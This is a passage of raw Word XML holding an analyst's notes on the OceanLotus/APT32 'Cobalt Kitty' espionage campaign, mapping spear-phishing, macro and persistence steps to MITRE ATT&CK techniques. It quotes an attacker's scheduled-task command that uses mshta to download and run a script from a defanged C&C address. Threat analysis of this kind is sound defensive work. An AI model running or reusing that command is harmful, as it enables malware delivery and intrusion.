          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> ships new backdoor using old tricks | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>WeLiveSecurity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B8AC4" w14:textId="77777777" w:rsidR="006819C1" w:rsidRDefault="006819C1" w:rsidP="0059419E">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId91" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Operation Cobalt Kitty: A large-scale APT in Asia carried out by the </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>OceanLotus</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> Group (cybereason.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2017]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7522B92D" w14:textId="2D72E59C" w:rsidR="00A34053" w:rsidRDefault="006819C1" w:rsidP="0059419E">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId92" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cybereason Labs Analysis Operation Cobalt Kitty.pdf (hubspot.net)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A64B0">
        <w:t xml:space="preserve">– Attack Lifecycle </w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00BD1B63">
        <w:t>2018]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5991D88B" w14:textId="77777777" w:rsidR="00A34053" w:rsidRDefault="00A34053" w:rsidP="0059419E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Fake or Fake: Keeping up with </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>OceanLotus</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> decoys | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>WeLiveSecurity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57801339" w14:textId="77777777" w:rsidR="00A34053" w:rsidRDefault="00A34053" w:rsidP="0059419E">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA95C0" w14:textId="77777777" w:rsidR="006A2E6F" w:rsidRDefault="00A34053" w:rsidP="0059419E">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf (amnestyusa.org)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A46650" w14:textId="77777777" w:rsidR="006A2E6F" w:rsidRDefault="006A2E6F" w:rsidP="0059419E"/>
    <w:p w14:paraId="0E62A3AF" w14:textId="372D23CC" w:rsidR="006A2E6F" w:rsidRDefault="006A2E6F" w:rsidP="0059419E">
      <w:r>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="00EB0610">
        <w:t xml:space="preserve"> Cybereason concluded the main motivation behind the attack was cyber espionage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A18BF6" w14:textId="47E4FC91" w:rsidR="008E209D" w:rsidRDefault="006A2E6F" w:rsidP="0059419E">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36829FDC" w14:textId="029257C9" w:rsidR="008E209D" w:rsidRDefault="00E52DF0" w:rsidP="008E209D">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidR="00917908">
        <w:t xml:space="preserve">Penetration Phase - </w:t>
      </w:r>
      <w:r w:rsidR="008E209D">
        <w:t xml:space="preserve">Two types payloads were found in the spear-phishing emails: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B07D97" w14:textId="6CF68CFA" w:rsidR="008E209D" w:rsidRDefault="008E209D" w:rsidP="008E209D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>1. Link to a malicious site that downloads a fake Flash Installer delivering Cobalt Strike Beacon (</w:t>
      </w:r>
      <w:r w:rsidRPr="008E209D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1566.002 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E209D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E209D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7123EBAC" w14:textId="77777777" w:rsidR="00E96C66" w:rsidRDefault="008E209D" w:rsidP="008E209D">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>2. Word documents with malicious macros downloading Cobalt Strike payloads (</w:t>
      </w:r>
      <w:r w:rsidRPr="008E209D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1566.001 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E209D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E209D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3944547F" w14:textId="3FDA6985" w:rsidR="00955E7A" w:rsidRPr="00163875" w:rsidRDefault="00955E7A" w:rsidP="00163875">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>[3] Word File with malicious macro delivering Cobalt Strike Beacon</w:t>
      </w:r>
      <w:r w:rsidR="00C738A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C738A1">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00C738A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1204.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C738A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;User Execution&gt;:Malicious Fil</w:t>
      </w:r>
      <w:r w:rsidR="00163875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C91CAB" w14:textId="7E81FDD7" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Other types of spear-phishing emails contained Microsoft Office Word attachments with different file names, such as CV.doc and Complaint_Letter.doc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE55254" w14:textId="1F55B4BC" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The malicious macro creates two scheduled tasks that download files camouflaged as “.jpg” files from the C&amp;C server: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF1C81">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00EF1C81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1053.005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF1C81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Scheduled Task/Job&gt;:Scheduled Task, </w:t>
      </w:r>
      <w:r w:rsidR="00CA15C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1105 : Ingress Tool Transfer, </w:t>
      </w:r>
      <w:r w:rsidR="00DF5FA2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036</w:t>
      </w:r>
      <w:r w:rsidR="00A30044">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, T1036.005 : &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
      <w:r w:rsidR="00F73469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5981F605" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scheduled task 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60781BDA" w14:textId="36BA155A" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00955E7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217225E2" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Scheduled task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE2942" w14:textId="1BD1ECE6" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00955E7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF510C" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00367647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post infection execution of scheduled task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D351BD1" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Example 1: Fileless downloader delivers Cobalt Strike Beacon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6978EE53" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The purpose of the scheduled task is to download another payload from the C&amp;C </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BD857" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">server: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61877AEA" w14:textId="66E24FFB" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>schtasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /create /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> MINUTE /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "Windows Error Reporting" /tr "mshta.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00917908">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00917908" w:rsidRPr="00917908">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1218.005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00917908" w:rsidRPr="00917908">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Binary Proxy Execution: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00917908" w:rsidRPr="00917908">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00917908" w:rsidRPr="00917908">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00917908">
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">about:'&lt;script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25833FC5" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>language=\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vbscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">\" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hxxp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">://110.10.179(.)65:80/download/microsoftp.jpg\"&gt;code close&lt;/script&gt;'" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37323D76" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 15 /F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6CA9FE" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>©2017 Cybereason Inc. All rights reserved. 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC22BBE" w14:textId="6B41F702" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The content of the “microsoftp.jpg” is a script that combines </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vbscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and PowerShell:</w:t>
      </w:r>
      <w:r w:rsidR="003470D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003470D7">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="003470D7" w:rsidRPr="003470D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003470D7" w:rsidRPr="003470D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Command and Scripting Interpreter&gt;:Visual Basic, T1059.001 : &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="003470D7">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70151A3F" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>SHA-1: 23EF081AF79E92C1FBA8B5E622025B821981C145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CD766" w14:textId="77777777" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">That downloads and executes an additional payload from the same server with a slightly </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40004F47" w14:textId="254940F4" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>different name “microsoft.jpg”.</w:t>
      </w:r>
      <w:r w:rsidR="003470D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003470D7">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 : Ingress Tool Transfer )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE2DEF" w14:textId="252E75D8" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obfuscated PowerShell delivering Cobalt Strike Beacon </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0064459B">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0064459B" w:rsidRPr="0064459B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0064459B" w:rsidRPr="0064459B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1027 : Obfuscated Files or Information</w:t>
      </w:r>
      <w:r w:rsidR="0064459B" w:rsidRPr="0064459B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0064459B">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- The contents of the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A650D2E" w14:textId="48F2D678" w:rsidR="00955E7A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“microsoft.jpg” file is, in fact, an obfuscated PowerShell payload (obfuscated with Daniel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B103366" w14:textId="00B5B1D1" w:rsidR="00BF2A6A" w:rsidRDefault="00955E7A" w:rsidP="00955E7A">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bohannon’s Invoke-obfuscation). </w:t>
      </w:r>
      <w:r w:rsidR="0064459B">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidR="0064459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">GitHub - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="0064459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>danielbohannon</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="0064459B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/Invoke-Obfuscation: PowerShell Obfuscator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0064459B">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D210DF" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFC3A13" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quick memory analysis of the payload reveals that it is a Cobalt Strike Beacon, as seen in the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77144A1E" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">strings found in the memory of the PowerShell process: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCD44B" w14:textId="10BF5B8D" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00367647">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gaining persistence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is one of the attack’s most important phases. It ensures that the malicious </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8EFC7" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:r>
        <w:t xml:space="preserve">code will run automatically and survive machine reboots. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913776B" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:r>
        <w:t xml:space="preserve">The attackers used trivial but effective persistence techniques to ensure that their malicious </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD8FA57" w14:textId="77777777" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:r>
        <w:t>tools executed constantly on the infected machines. Those techniques consist of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108DDD5" w14:textId="41ECD7B4" w:rsidR="00BF2A6A" w:rsidRPr="001A63B7" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>● Windows Registry Autorun</w:t>
      </w:r>
      <w:r w:rsidR="001A63B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1547.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C330287" w14:textId="28C120EF" w:rsidR="00BF2A6A" w:rsidRDefault="00BF2A6A" w:rsidP="00BF2A6A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>● Windows Services</w:t>
      </w:r>
      <w:r w:rsidR="001A63B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001A63B7">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="001A63B7" w:rsidRPr="001A63B7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
